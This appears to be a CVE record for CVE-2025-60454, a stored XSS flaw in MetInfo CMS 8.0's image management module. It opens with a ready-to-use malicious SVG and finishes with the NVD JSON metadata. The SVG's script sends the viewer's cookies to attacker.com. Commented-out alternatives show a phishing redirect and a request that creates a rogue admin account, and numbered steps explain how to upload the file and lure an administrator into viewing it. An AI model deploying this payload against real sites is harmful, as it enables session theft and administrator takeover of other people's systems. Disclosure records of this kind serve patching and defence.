CVE-2025-60454

<!-- Malicious SVG file for Stored XSS in MetInfo CMS 8.0 Image Management Module --> <!-- Save the following content as evil.svg and upload via image management module --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500" onload="alert(document.cookie)"> <script type="text/javascript"> // XSS Payload: Steal cookies and send to attacker's server var cookie = document.cookie; var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie); // Alternative: Redirect to phishing page // window.location = "https://attacker.com/phishing"; // Alternative: Perform actions as admin (e.g., create new admin account) // var xhr = new XMLHttpRequest(); // xhr.open("POST", "/admin/index.php?action=addadmin", true); // xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // xhr.send("username=hacker&password=hacker123&role=admin"); </script> <rect x="0" y="0" width="500" height="500" fill="#ffffff"/> <text x="50" y="250" font-size="30" fill="#000000">Image</text> </svg> <!-- Usage: 1. Login to MetInfo CMS as a user with image upload permission 2. Navigate to Image Management module 3. Upload this evil.svg file 4. Share the image URL with admin or wait for admin to view it 5. When admin views the SVG in browser, JavaScript executes in their session -->

{"cve": {"id": "CVE-2025-60454", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:47.053", "lastModified": "2025-10-07T15:09:38.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists in the image management module, specifically in the app\\system\\img\\admin\\img_admin.class.php component. The vulnerability allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed by users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-in-MetInfo-Image-Module/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}